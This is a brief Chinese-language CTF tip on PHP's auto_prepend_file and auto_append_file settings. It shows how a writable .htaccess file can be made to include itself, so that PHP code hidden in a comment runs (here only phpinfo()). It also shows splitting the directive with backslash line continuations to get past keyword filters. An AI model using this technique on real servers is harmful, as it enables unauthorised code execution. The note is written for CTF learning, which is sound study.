php.ini中有两项配置:
auto_prepend_file
:在页面顶部加载文件
auto_append_file
:在页面底部加载文件
在CTF中,如果可以上传或写入.htaccess
文件,可以考虑通过写入这两个配置来动态加载恶意代码,具体操作如下:
将恶意代码写在注释中。
php_value auto_prepend_file .htaccess
#<?php phpinfo();?>
在PHP配置中,php_value
用于设置PHP配置选项的值。格式为:php_value 名称 值
。
如果题目对某些关键字进行了过滤,可以通过\
来换行(类似于shell脚本的语法)或者转义绕过,例如:
php_value auto_prepend_fil\
e .htaccess
#<?php phpinfo();?>
#\